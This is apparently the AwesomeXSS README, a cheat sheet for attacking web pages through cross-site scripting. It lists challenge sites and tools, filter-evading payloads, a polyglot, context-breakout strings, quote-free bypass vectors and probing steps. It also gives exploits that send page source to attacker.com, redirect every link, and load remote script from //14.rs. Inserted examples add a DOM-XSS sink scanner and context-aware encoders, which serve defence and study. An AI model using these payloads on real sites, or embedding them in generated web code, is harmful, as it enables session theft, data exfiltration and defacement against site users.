# AwesomeXSS

Awesome XSS stuff.

Put this repo on watch. I will be updating it regularly.

### Awesome Challenges

- [prompt.ml](https://prompt.ml)
- [alf.nu/alert1](https://alf.nu/alert1)
- [s-p-o-o-k-y.com](https://www.s-p-o-o-k-y.com)
- [xss-game.appspot.com](https://xss-game.appspot.com)
- [polyglot.innerht.ml](https://polyglot.innerht.ml)
- [sudo.co.il/xss](http://sudo.co.il/xss)
- [hack.me/t/XSS](https://hack.me/t/XSS)
- [root-me.org](https://www.root-me.org/?page=recherche&lang=en&recherche=xss)
- [chefsecure.com](https://chefsecure.com/courses/xss/challenges)
- [wechall.net](https://www.wechall.net/challs/XSS)

### Awesome Reads & Presentations

- [Bypassing XSS Detection Mechanisms](https://github.com/s0md3v/MyPapers/tree/master/Bypassing-XSS-detection-mechanisms)
- [XSS in Sarahah](http://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html)
- [XSS in Facebook via PNG Content Type](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)
- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc)
- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos)
- [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE)
- [Copy Pest](https://www.slideshare.net/x00mario/copypest)

### Awesome Tools

- [XSStrike](https://github.com/UltimateHackers/XSStrike)
- [xsshunter.com](https://xsshunter.com)
- [BeEF](https://github.com/beefproject/beef)
- [JShell](https://github.com/UltimateHackers/JShell)

### Awesome XSS Mind Maps

A beautiful XSS mind map by Jack Masa, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png)

### Awesome DOM XSS

- Does your input go into a sink? `Vulnerable`
- It doesn't? `Not vulnerable`

**Source**: An input that could be controlled by an external (untrusted) source.

```
document.URL
document.documentURI
document.URLUnencoded (IE 5.5 or later only)
document.baseURI
location
location.href
location.search
location.hash
location.pathname
document.cookie
document.referrer
window.name
history.pushState()
history.replaceState()
localStorage
sessionStorage
```

**Sink**: A potentially dangerous method that could lead to a vulnerability, in this case a DOM based XSS.

```
eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
document.write
document.writeln
anyElement.innerHTML
Range.createContextualFragment
window.location
document.location
```

This comprehensive list of sinks and sources is taken from [domxsswiki](https://github.com/wisec/domxsswiki).

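The source and sink lists above are also what a code reviewer greps for. The following scanner is an added example (not code from the AwesomeXSS repo or domxsswiki): it turns the two lists into regular expressions, tracks taint through simple assignments to local identifiers, and reports each statement where a source or a tainted identifier reaches a sink. The `SAMPLE` script and the identifier names in it are constructed for the demonstration; the ScriptElement sinks are left out because telling a `<script>` element apart from any other element needs a real parser, not a regex.

```javascript
// Added example, not code from the AwesomeXSS repo: a heuristic source-to-sink
// scanner for client-side JavaScript built from the source and sink lists above.
// It tracks taint through simple assignments to local identifiers and reports
// every statement in which a source (or a tainted identifier) reaches a sink.
// It is a regex-based review aid, not a parser: flows through function calls,
// object properties and template literals are missed, and "//" inside a string
// is treated as a comment.

// Textually matchable sources from the list above (history.pushState and
// history.replaceState are left out: they are calls, not reads).
const SOURCE_RE = new RegExp(
  "\\bdocument\\.(?:URL|documentURI|URLUnencoded|baseURI|cookie|referrer)\\b|" +
    "\\blocation\\b(?:\\.(?:href|search|hash|pathname))?|" +
    "\\bwindow\\.name\\b|\\b(?:localStorage|sessionStorage)\\b"
);

// Sinks that receive their dangerous input as a call argument.
const CALL_SINK_RE =
  /\b(?:eval|Function|setTimeout|setInterval|setImmediate|execScript|document\.write|document\.writeln|createContextualFragment)\s*\(/;

// Sinks that are dangerous as the target of an assignment. The ScriptElement
// properties (src, text, textContent, innerText) are deliberately left out:
// deciding whether the receiver is a <script> element needs a real parser.
const ASSIGN_SINK_RE =
  /(?:\.innerHTML|\b(?:window\.|document\.)?location(?:\.href)?|\.on[a-z]+)$/;

// Splits "lhs = rhs"; the lookahead keeps ==, === and => from being treated as
// assignments.
const ASSIGN_RE = /^\s*(?:var|let|const)?\s*([\w$.\[\]()'"]+)\s*=(?![=>])\s*(.*)$/;

function scanForDomXss(code) {
  const tainted = new Set();
  const findings = [];
  code.split("\n").forEach((rawLine, idx) => {
    const stmt = rawLine.replace(/\/\/.*$/, "").trim().replace(/;\s*$/, "");
    if (!stmt) return;
    const taintedRe = tainted.size
      ? new RegExp("\\b(?:" + [...tainted].map((n) => n.replace(/\$/g, "\\$")).join("|") + ")\\b")
      : null;
    const m = ASSIGN_RE.exec(stmt);
    const lhs = m ? m[1] : "";
    const rhs = m ? m[2] : stmt; // for non-assignments inspect the whole statement
    const sourceHit = SOURCE_RE.exec(rhs);
    const taintHit = taintedRe ? taintedRe.exec(rhs) : null;
    const via = sourceHit ? sourceHit[0] : taintHit ? taintHit[0] : null;
    if (!via) return; // nothing attacker-controlled on this line
    // A plain local identifier assigned from tainted data becomes tainted itself.
    if (m && /^[A-Za-z_$][\w$]*$/.test(lhs)) tainted.add(lhs);
    const callSink = CALL_SINK_RE.exec(rhs);
    const assignSink = m ? ASSIGN_SINK_RE.exec(lhs) : null;
    const sink = callSink ? callSink[0].replace(/\s*\($/, "") : assignSink ? assignSink[0] : null;
    if (sink) findings.push({ line: idx + 1, sink, via });
  });
  return findings;
}

// Constructed sample: a page script that reads the URL in three ways and uses
// the results both safely (textContent) and unsafely (innerHTML, eval, location).
const SAMPLE = [
  'const frag = location.hash.slice(1);',
  'const params = new URLSearchParams(location.search);',
  'const q = params.get("q");',
  'document.getElementById("out").innerHTML = "You searched for " + q;',
  'document.getElementById("out").textContent = q;',
  'eval(decodeURIComponent(frag));',
  'document.write("<title>" + document.title + "</title>");',
  'setTimeout("alert(1)", 100);',
  'location.href = params.get("next");',
].join("\n");

console.log(scanForDomXss(SAMPLE));
// [ { line: 4, sink: '.innerHTML', via: 'q' },
//   { line: 6, sink: 'eval', via: 'frag' },
//   { line: 9, sink: 'location.href', via: 'params' } ]
```

Lines 5, 7 and 8 of the sample are not reported: `textContent` is not a sink, `document.title` is not a source, and a literal string passed to `setTimeout` carries no attacker data. Treat the output as a worklist for manual review, not a verdict.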
### Awesome Payloads

```
<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javascript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>
```

### Awesome Polyglots

Here's an XSS polyglot that I made which can break out of 20+ contexts:

```
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
```

An explanation of how it works is [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png).

### Awesome Tags & Event Handlers

- [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
- [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)

Some less detected event handlers

```
ontoggle
onauxclick
ondblclick
oncontextmenu
onmouseleave
ontouchcancel
```

Some HTML tags that you will be using

```
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
```

### Awesome Context Breaking

#### HTML Context

Case: `<tag>You searched for $input. </tag>`

```
<svg onload=alert()>
</tag><svg onload=alert()>
```

#### Attribute Context

Case: `<tag attribute="$input">`

```
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()
```

#### JavaScript Context

Case: `<script> var something = '$input'; </script>`

```
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
```

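Each of the three cases above is fixed by the same rule: encode the input for the context it lands in, not for "HTML" in general. The block below is an added example (not code from the AwesomeXSS repo) with one encoder per context, applied to the page's own breakout payloads; the `renderHtml`, `renderAttr` and `renderJs` templates are constructed to mirror the three `Case:` lines, and the `*IsSafe` checks verify that the rendered output still has only the template's own tags, a closed attribute, and a single string literal in the script. It also shows the common mistake the Tips section hints at from the other side: HTML-encoding into an unquoted attribute still lets a space start a new attribute.

```javascript
// Added example, not code from the AwesomeXSS repo: context-aware output
// encoding, the defender's counterpart to the three "Case:" breakouts above.
// Each encoder is applied to the page's own payloads for its context and the
// rendered result is checked to still sit inside that context. The template
// strings below are constructed to mirror the three cases.

// HTML body context: <tag>You searched for $input.</tag>
function encodeForHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Quoted attribute context: <tag attribute="$input">. Everything outside
// [A-Za-z0-9] becomes &#xHH;, so neither quote, whitespace nor "/" can end the
// value or start a new attribute.
function encodeForAttribute(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => "&#x" + c.charCodeAt(0).toString(16).toUpperCase() + ";");
}

// JS string context: <script>var something = '$input';</script>. Uses JS
// escapes, not HTML entities (entities are not decoded inside <script>): the
// quote, the backslash, line terminators and "<" (which would otherwise allow
// </script> to end the block early) are all neutralised.
function encodeForJsString(s) {
  return s.replace(/[^A-Za-z0-9 ]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? "\\x" + code.toString(16).padStart(2, "0")
                        : "\\u" + code.toString(16).padStart(4, "0");
  });
}

function renderHtml(input) { return "<b>You searched for " + encodeForHtml(input) + ".</b>"; }
function renderAttr(input) { return '<input value="' + encodeForAttribute(input) + '">'; }
function renderJs(input)   { return "<script>var something = '" + encodeForJsString(input) + "';</script>"; }

// Wrong encoder for the context: HTML entities in an *unquoted* attribute.
// A space ends the value, so a new attribute can still be injected.
function renderUnquotedAttr(input) { return "<input value=" + encodeForHtml(input) + ">"; }

// Context checks: the only "<" are the template's own tags; the attribute
// value contains no quote, whitespace or angle bracket; the script body is one
// string literal made of safe characters and \x / \u escapes.
function htmlIsSafe(input) { return (renderHtml(input).match(/</g) || []).length === 2; }
function attrIsSafe(input) { return /^<input value="[^"'\s<>]*">$/.test(renderAttr(input)); }
function jsIsSafe(input) {
  return /^<script>var something = '(?:[A-Za-z0-9 ]|\\x[0-9a-f]{2}|\\u[0-9a-f]{4})*';<\/script>$/.test(renderJs(input));
}
function unquotedAttrIsSafe(input) { return /^<input value=[^\s"'<>]*>$/.test(renderUnquotedAttr(input)); }

// Payloads copied from the three "Case:" sections above.
const HTML_PAYLOADS = ["<svg onload=alert()>", "</tag><svg onload=alert()>"];
const ATTR_PAYLOADS = ['"><svg onload=alert()>', '" onmouseover=alert() "', '"onmouseover=alert()//', '"autofocus/onfocus="alert()'];
const JS_PAYLOADS = ["'-alert()-'", "'-alert()//'", "'}alert(1);{'", "</script><svg onload=alert()>"];

function checkAll() {
  return {
    html: HTML_PAYLOADS.every(htmlIsSafe),
    attr: ATTR_PAYLOADS.every(attrIsSafe),
    js: JS_PAYLOADS.every(jsIsSafe),
    unquotedAttr: unquotedAttrIsSafe("x onmouseover=alert()"), // false: wrong encoder for the context
  };
}

console.log(checkAll()); // { html: true, attr: true, js: true, unquotedAttr: false }
```

The JS encoder deliberately escapes `<` as `\x3c`: without that, `</script>` inside the string literal would still close the script block, because the HTML parser runs before the JavaScript parser and does not care about string boundaries.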
### Awesome Confirm Variants

Yep, confirm because alert is too mainstream.

```
confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)
```

### Awesome Exploits

##### Replace all links

```javascript
Array.from(document.getElementsByTagName("a")).forEach(function(i) {
  i.href = "https://attacker.com";
});
```

##### Source Code Stealer

```html
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
```

A good compilation of advanced XSS exploits can be found [here](http://www.xss-payloads.com/payloads-list.html?a#category=all)

### Awesome Probing

If none of this works, take a look at the **Awesome Bypassing** section.

First of all, enter a non-malicious string like **d3v** and look at the source code to get an idea of the number and contexts of reflections.

For attribute context, check whether double quotes (") are being filtered by entering `x"d3v`. If it gets altered to `x&quot;d3v`, chances are that the output is being properly escaped. If this happens, try the same for single quotes (') by entering `x'd3v`; if the quote comes back as an entity such as `x&#39;d3v`, you are doomed. The only thing you can try is encoding.

If the quotes are not being filtered, you can simply try payloads from the **Awesome Context Breaking** section.

For JavaScript context, check which quotes are being used, for example whether they are doing

```
variable = 'value' or variable = "value"
```

Now let's say single quotes (') are in use. In that case enter `x'd3v`. If it gets altered to `x\'d3v`, try escaping the backslash (\) by adding a backslash to your probe, i.e. `x\\'d3v`. If it works, use the following payload:

```
\'-alert()//
```

But if it gets altered to `x\\\'d3v`, the only thing you can try is closing the script tag itself by using

```
</script><svg onload=alert()>
```

For simple HTML context, the probe is `x<d3v`. If it gets altered to `x&lt;d3v`, proper sanitization is in place. If it gets reflected as is, you can enter a dummy tag to check for potential filters. The dummy tag I like to use is `x<xxx>`. If it gets stripped or altered in any way, it means the filter is looking for a pair of `<` and `>`. It can simply be bypassed using

```
<svg onload=alert()//
```

or this (it will not work in all cases)

```
<svg onload=alert()
```

If your dummy tag lands in the source code as it is, go for any of these payloads

```
<svg onload=alert()>
<embed src=//14.rs>
<details open ontoggle=alert()>
```

### Awesome Bypassing

**Note:** None of these payloads use single (') or double quotes (").

- Without event handlers

```
<object data=javascript:confirm()>
<a href=javascript:confirm()>click here
<script src=//14.rs></script>
<script>confirm()</script>
```

- Without space

```
<svg/onload=confirm()>
<iframe/src=javascript:alert(1)>
```

- Without slash (/)

```
<svg onload=confirm()>
<img src=x onerror=confirm()>
```

- Without equal sign (=)

```
<script>confirm()</script>
```

- Without closing angle bracket (>)

```
<svg onload=confirm()//
```

- Without alert, confirm, prompt

```
<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>
```

- Without a valid HTML tag

```
<x onclick=confirm()>click here
<x ondrag=confirm()>drag it
```

- Bypass tag blacklisting

```
</ScRipT>
</script
</script/>
</script x>
```

### Awesome Encoding

|HTML|Char|Numeric|Description|Hex|CSS (ISO)|JS (Octal)|URL|
|----|----|-------|-----------|---|---------|----------|---|
|`&quot;`|"|`&#34;`|quotation mark|u+0022|\0022|\42|%22|
|`&num;`|#|`&#35;`|number sign|u+0023|\0023|\43|%23|
|`&dollar;`|$|`&#36;`|dollar sign|u+0024|\0024|\44|%24|
|`&percnt;`|%|`&#37;`|percent sign|u+0025|\0025|\45|%25|
|`&amp;`|&|`&#38;`|ampersand|u+0026|\0026|\46|%26|
|`&apos;`|'|`&#39;`|apostrophe|u+0027|\0027|\47|%27|
|`&lpar;`|(|`&#40;`|left parenthesis|u+0028|\0028|\50|%28|
|`&rpar;`|)|`&#41;`|right parenthesis|u+0029|\0029|\51|%29|
|`&ast;`|*|`&#42;`|asterisk|u+002A|\002a|\52|%2A|
|`&plus;`|+|`&#43;`|plus sign|u+002B|\002b|\53|%2B|
|`&comma;`|,|`&#44;`|comma|u+002C|\002c|\54|%2C|
|`&minus;`|-|`&#45;`|hyphen-minus|u+002D|\002d|\55|%2D|
|`&period;`|.|`&#46;`|full stop; period|u+002E|\002e|\56|%2E|
|`&sol;`|/|`&#47;`|solidus; slash|u+002F|\002f|\57|%2F|
|`&colon;`|:|`&#58;`|colon|u+003A|\003a|\72|%3A|
|`&semi;`|;|`&#59;`|semicolon|u+003B|\003b|\73|%3B|
|`&lt;`|<|`&#60;`|less-than|u+003C|\003c|\74|%3C|
|`&equals;`|=|`&#61;`|equals|u+003D|\003d|\75|%3D|
|`&gt;`|>|`&#62;`|greater-than sign|u+003E|\003e|\76|%3E|
|`&quest;`|?|`&#63;`|question mark|u+003F|\003f|\77|%3F|
|`&commat;`|@|`&#64;`|at sign; commercial at|u+0040|\0040|\100|%40|
|`&lsqb;`|[|`&#91;`|left square bracket|u+005B|\005b|\133|%5B|
|`&bsol;`|\\|`&#92;`|backslash|u+005C|\005c|\134|%5C|
|`&rsqb;`|]|`&#93;`|right square bracket|u+005D|\005d|\135|%5D|
|`&Hat;`|^|`&#94;`|circumflex accent|u+005E|\005e|\136|%5E|
|`&lowbar;`|_|`&#95;`|low line|u+005F|\005f|\137|%5F|
|`&grave;`|`` ` ``|`&#96;`|grave accent|u+0060|\0060|\140|%60|
|`&lcub;`|{|`&#123;`|left curly bracket|u+007B|\007b|\173|%7B|
|`&verbar;`|\||`&#124;`|vertical bar|u+007C|\007c|\174|%7C|
|`&rcub;`|}|`&#125;`|right curly bracket|u+007D|\007d|\175|%7D|

Two caveats on the HTML column: `&minus;` actually decodes to U+2212 (minus sign), not to hyphen-minus U+002D, which has no named entity, so use the numeric form for it; and only `&quot;`, `&amp;`, `&lt;` and `&gt;` predate HTML5, so the other names are not understood by every parser that consumes HTML.

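Every column of the table except the named entity is a function of the code point, which is the easiest way to check a row or extend the table to characters it does not list. The block below is an added example (not code from the AwesomeXSS repo): `encodings()` derives the numeric, hex, CSS, JS octal and URL forms (plus the hexadecimal character reference the table omits), the four decoders confirm that each form names the same character, and `toMarkdownRow()` rebuilds a row in the table's own layout. The `NAMED_ENTITY` map is constructed from the rows above and stops at what the table lists.

```javascript
// Added example, not code from the AwesomeXSS repo: derives each column of the
// table above from a character's code point so that any row can be regenerated
// or checked, and decodes each form back to prove they all name the same
// character. The named-entity map is constructed for the rows above; names are
// not derivable, every other column is.

const NAMED_ENTITY = {
  '"': "quot", "#": "num", "$": "dollar", "%": "percnt", "&": "amp", "'": "apos",
  "(": "lpar", ")": "rpar", "*": "ast", "+": "plus", ",": "comma", ".": "period",
  "/": "sol", ":": "colon", ";": "semi", "<": "lt", "=": "equals", ">": "gt",
  "?": "quest", "@": "commat", "[": "lsqb", "\\": "bsol", "]": "rsqb", "^": "Hat",
  "_": "lowbar", "`": "grave", "{": "lcub", "|": "verbar", "}": "rcub",
};

function encodings(ch) {
  const cp = ch.codePointAt(0);
  const hex4 = cp.toString(16).toUpperCase().padStart(4, "0");
  return {
    char: ch,
    html: ch in NAMED_ENTITY ? "&" + NAMED_ENTITY[ch] + ";" : null, // no name: use a numeric form
    numeric: "&#" + cp + ";",                          // decimal character reference
    hexRef: "&#x" + hex4 + ";",                        // hexadecimal character reference
    hex: "u+" + hex4,
    css: "\\" + hex4.toLowerCase(),                    // CSS escape, padded to 4 hex digits
    jsOctal: cp < 0o400 ? "\\" + cp.toString(8) : null, // legacy octal escape, \0 to \377 only; rejected in strict mode
    url: cp < 0x80 ? "%" + hex4.slice(-2) : encodeURIComponent(ch), // one byte for ASCII, UTF-8 bytes otherwise
  };
}

// Decoders for each syntax, used to confirm that every column round-trips.
const decodeNumeric = (s) => String.fromCodePoint(parseInt(s.slice(2, -1), 10));
const decodeHexRef = (s) => String.fromCodePoint(parseInt(s.slice(3, -1), 16));
const decodeCss = (s) => String.fromCodePoint(parseInt(s.slice(1), 16));
const decodeJsOctal = (s) => String.fromCodePoint(parseInt(s.slice(1), 8));

function roundTrips(ch) {
  const e = encodings(ch);
  const decoded = [decodeNumeric(e.numeric), decodeHexRef(e.hexRef), decodeCss(e.css), decodeURIComponent(e.url)];
  if (e.jsOctal !== null) decoded.push(decodeJsOctal(e.jsOctal));
  return decoded.every((d) => d === ch);
}

// Rebuilds one row of the markdown table above (the pipe, backtick and
// backslash in the Char column are escaped so the row renders).
function toMarkdownRow(ch, description) {
  const e = encodings(ch);
  const charCell = ch === "|" ? "\\|" : ch === "`" ? "`` ` ``" : ch === "\\" ? "\\\\" : ch;
  return ["", "`" + e.html + "`", charCell, "`" + e.numeric + "`", description, e.hex, e.css, e.jsOctal, e.url, ""].join("|");
}

console.log(toMarkdownRow("`", "grave accent"));
// |`&grave;`|`` ` ``|`&#96;`|grave accent|u+0060|\0060|\140|%60|
```

Note the two boundaries the code makes explicit: the JS octal column only exists below `\400` (and is a syntax error in strict-mode code), and the single-byte `%HH` URL form only holds for ASCII; anything above U+007F is percent-encoded per UTF-8 byte.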
### Awesome Tips & Tricks

- `http(s)://` can be shortened to `//` or `/\` or `\\`.
- `document.cookie` can be shortened to `cookie`. It applies to other DOM objects as well.
- alert and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()`.
- You can use `//` to close a tag instead of `>`.
- I have found that `confirm` is the least detected pop-up function, so stop using `alert`.
- Quotes around an attribute value aren't necessary as long as the value doesn't contain spaces. You can use `<script src=//14.rs>` instead of `<script src="//14.rs">`.
- The shortest HTML context XSS payload is `<script src=//14.rs>` (19 chars).

### Awesome Credits

All the payloads are crafted by me unless specified.